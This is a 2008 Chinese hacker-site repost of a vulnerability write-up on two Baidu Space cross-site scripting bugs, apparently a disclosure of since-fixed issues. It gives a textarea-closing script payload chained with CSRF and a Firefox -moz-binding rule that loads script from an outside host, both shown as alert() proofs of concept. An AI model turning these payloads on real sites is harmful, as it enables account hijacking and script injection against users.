黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 脚本入侵 >> 正文
·没有路由密码权限时的鸽08-23·上网安全 Vista自我防范10-11
·让濒临崩溃的Windows XP10-11·有备无患,快速自制救急10-11
·要你好看!Windows看图工10-11·空间赞助网提供不同类型10-11
·讨论net.exe和net1.exe的10-10·让3389远程桌面传输更通10-10
·巧妙入侵渗透赌博站10-10·Aspx空间扫权限工具10-10
·Windows2003最新提权工具10-10·易淘乐提供100M免费全能10-10
·系统开机密码忘了不着急10-09·中意网络提供免费100M免10-09
·与众不同 Windows XP开始10-08·让桌面图标翻跟斗 在XP上10-08
·上海宽元站长资助计划-提10-08·个性化Windows XP的任务10-07
·趣盘提供3G免费网络硬盘10-07·秀山热线提供200MB免费全10-07
·一次艰辛的提权过程10-06·成功入侵IT大卖场的渗透10-06
·mysqlhack- MYSQL利用工10-06·lanker一句话PHP后门客户10-06
·WIXI提供3G免费多媒体网10-06·新人网络提供100M/ftp免10-06
·如何利用QQ带来高流量10-05·UuShare提供免费网络文件10-05
[组图]百度跨站漏洞谢幕篇
        ★★★★★

百度跨站漏洞谢幕篇

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2008-7-19 10:55:04

 

XSS 14: 百度空间保存自定义模板XSS漏洞

百度空间自定义模板是可以自己写CSS的。
自定义模板的界面是一个textarea,但是这个textarea标签是可以闭合的。(后来我发现monyer在blog上也指出过类似的问题。)

如果在保存模板处写入:

以下是引用片段:
</textarea><script>alert(/XSS/);</script>

那么实际上<textarea>就被闭合了,其后就能写入任意脚本。

实际上这属于一个Stored XSS,但是写入的是编辑模板的页面,没办法跨页面

由于css的编号是可以直接从页面的代码里读出来的,所以编辑模板处是存在CSRF漏洞的
按照我在Day 02里提出的构造表单提交的办法,就可以直接把这个XSS写入到编辑模板页面

以后空间的主人去编辑模板的时候,就会被XSS

这也是一个从CSRF的危害扩大到XSS的例子。

所以请注意这是个危害非常大的漏洞。

XSS 15:百度空间自定义模板XSS漏洞(Firefox)

又是一个只针对Firefox的漏洞。

自定义模板是用<link>标签插入到首页去的。

在自定义模板中,构造特定的样式能够导致在Firefox下的XSS
构造如下:

以下是引用片段:
BODY{-moz-binding:url(”http://ha.ckers.org/xssmoz.xml#xss”)}

保存模板后,在firefox里访问首页,将造成跨站

xml文件代码如下:

以下是引用片段:
<bindings>
<binding id=”xss”>
<implementation>
<constructor>alert(’XSS’)</constructor>
</implementation>
</binding>
</bindings>

不过最近Firefox更新了(2.0.0.16),修补了这个XSS漏洞,所以这个漏洞以后就没用了。

漏洞讲完了,到扯淡时间了。一切都结束了吗?没有,才刚刚开始而已,不过那扯淡的将是下一篇了,稍后再发出来。

上一页  [1] [2] 

文章录入:cainiaowang    责任编辑:xinlian 
【字体:
Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
ICP备案:冀06009886